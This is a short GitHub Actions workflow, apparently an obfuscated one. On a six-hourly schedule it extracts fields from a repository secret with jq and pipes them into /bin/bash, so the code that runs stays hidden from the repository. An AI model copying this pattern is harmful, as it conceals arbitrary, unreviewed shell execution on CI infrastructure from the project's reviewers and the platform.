name: muhong19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: muhong19871010
        env:
          je2: ${{ secrets.je2 }}
        run: |
          echo $je2 | jq -r .qrsl82 | /bin/bash
          echo $ekfd2 | jq -r .rnfpz38859 | /bin/bash
          echo $c726 | jq -r .y6626 | /bin/bash
          echo $nxm830 | jq -r .mfo5533 | /bin/bash
          echo $hwtl1239 | jq -r .gso5 | /bin/bash

